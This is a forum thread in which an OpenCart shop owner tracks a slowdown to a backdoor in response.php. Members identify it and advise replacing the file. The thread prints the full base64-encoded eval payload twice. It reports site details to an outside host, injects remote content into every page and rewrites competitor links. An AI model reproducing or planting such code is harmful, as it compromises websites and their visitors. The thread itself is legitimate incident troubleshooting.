Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

[Решено] Помогите разобраться со скриптом. Тормозит сайт.


oleg67

Recommended Posts

Народ, может кто подскажет в чём проблема может быть. Работал сайт (http:/prochip.com.ua) до недавнего времени отлично, без сучка и задоринки, так сказать. Потом буквально пару недель назад стал жутко тормозить. В основном это чувсвтуется в админке, кода управляешь товаром. Тормоза жуткие. Я сначало было подумал, что проблема в мало-по-малу выросшей БД сайта. Однако, на этом же хостинге был точно такой же (копия) тестовый сайт на другом домене, но с гораздо более скудной БД. Просто я на нём всякие фичи пробую прежде, чем поставить на реально работающий сайт.
Так вот, оказалось, что он тормозит точно также, как и основной.  Решил обратиться в ТП хостера. Они поковыряли и сказали, что скрипты сайта стучат куда-то на сервер с адресом IP = 174.137.191.16
на порт 80, который якобы (как я понял) сейчас не доступен там. Более того они написали вот чё:
- - - - - -  - - -
Результат выполнения команды strace php index.php показазал - http://prochip.com.ua/strace.txt что скрипты сайта обращаются к стороннему ресурсу - 174.137.191.16
Код - connect(7, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("174.137.191.16")}, 16) = -1 EINPROGRESS (Operation now in progress)
Вы можете по ссылке http://prochip.com.ua/strace.txt найти строку , с данным обращением, проблема в том, что по 80-м порту данный IP не опрашивается:
telnet 174.137.191.16 80
Trying 174.137.191.16...

Из-за этого , по всей видимости и возникает задержка в работе сайта. Со стороны сервера изменения не проводились. Нужно уточнить что это за ресурс, обратитесь пожалуйста к разработчику сайта.
- - - - - - - - -
Как решить эту проблему? И что это за попытки куда-то стучать?
Кто-то  может  помочь решить?

Надіслати
Поділитися на інших сайтах


А при чём тут варез, если osStore который там стоит бесплатный, свободно распространяемый продукт, скачанный с сайта переводчика?
Вот на счёт модулей - согласен. Но, во-первых, там модулей сторонних не так  много, а во-вторых, я их, если  память не изменяет, здесь брал.
Может, конечно, что забыл.. Давно ведь ставил. 
P.S> Проверить то я проверю, только я не уверен, что стучалка запрограммирована в явном виде.

Надіслати
Поділитися на інших сайтах


Ну да, в конце скрипта функция оутпут, с выводом бешенного куска кода в  переменную $output :

eval(base64_decode('ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0='));
}
}
}
?>

И чё с этим делать ? Удалить нафиг?

Надіслати
Поділитися на інших сайтах


ГГ)))

 

А клялся что ниразу ни-ни.

 

Ничего с ним не делать,просто удалить.Скачать архив отсюда

 

https://myopencart.com/

 

и заменить.

 

Ну и не забывать,что бесплатный сыр,признак скорого наказания.Жизненный такой принцип!

Надіслати
Поділитися на інших сайтах

Спасибо, Tom. Но, признаться, как то стремновату новый скрипт заливать, так как там делал кучу изменений под себя. Как представлю, что снова сидеть.. Это самый крайний случай, я думаю.
Что, разве удаление этого куска кода не попустит проблему?
P.S> В файле index.php в корне, в самом его конце стоит вызов функции output той самой...

// Output
$response->output();
?>


А в файле system/library/response.php  вот то, что я напсиал выше. НО приведу полный текст  этого файла

class Response {
private $headers = array();
private $level = 0;
private $output;

public function addHeader($header) {
$this->headers[] = $header;
}

public function redirect($url) {
header('Location: ' . $url);
exit;
}

public function setCompression($level) {
$this->level = $level;
}

public function setOutput($output) {
$this->output = $output;
}

private function compress($data, $level = 0) {
if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip') !== false)) {
$encoding = 'gzip';
}

if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'x-gzip') !== false)) {
$encoding = 'x-gzip';
}

if (!isset($encoding)) {
return $data;
}

if (!extension_loaded('zlib') || ini_get('zlib.output_compression')) {
return $data;
}

if (headers_sent()) {
return $data;
}

if (connection_status()) {
return $data;
}

$this->addHeader('Content-Encoding: ' . $encoding);

return gzencode($data, (int)$level);
}

public function output() {
if ($this->output) {
if ($this->level) {
$ouput = $this->compress($this->output, $this->level);
} else {
$ouput = $this->output;
}

if (!headers_sent()) {
foreach ($this->headers as $header) {
header($header, true);
}
}

$ouput = eval(base64_decode('ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0='));
}
}
}
?>


Так что? Возможно спросто удалить нафиг да  и всё?

Надіслати
Поділитися на інших сайтах


Когда вы сказали, что с сайта переводчика, то это сразу все поставило на свои места.

Не вы первый, и, жаль, не последний.

Надіслати
Поділитися на інших сайтах

ок. Сейчас попробую, предварительно сделав копию сайта. :)

А, если не секрет, просветите - что это за стучалка? И откуда могла взяться?

 

 хватит погуглить этот адрес

174.137.191.16 
Надіслати
Поділитися на інших сайтах

Да гуглил, Tom  и что? Вроде какая-то софтверная контора в США. Честно говоря, мне ни о чём не сказало... Понимаю, что тёмный.., но...
Или я не прав на счёт конторы?

Надіслати
Поділитися на інших сайтах


Спасибо, chukcha. Много помогли.  Да ну не мог подумать, что там говно лежало.. , ей Богу.  Хрен знает, к тому же, не особо помню брал ли я его там или здесь. Возможно, с каким-либо внешним модулем пришёл этот говно-код.
Ну да ладно. В любом случае победили совместными усилиями.
Ещё раз спасибо всем.
Тема, думаю, закрыта.

Надіслати
Поділитися на інших сайтах


  • 1 month later...

модули с вареза ставили?

в первую очередь проверяйте response.php (поиск по форуму) и index.php

Спасибо большое за наводку response.php, то же был закодирован кусок кода, так и не понял когда этот файл заменил так как модули все в ручную добавлял и их не так много

Надіслати
Поділитися на інших сайтах


Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
  • Зараз на сторінці   0 користувачів

    • Ні користувачів, які переглядиють цю сторінку

×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.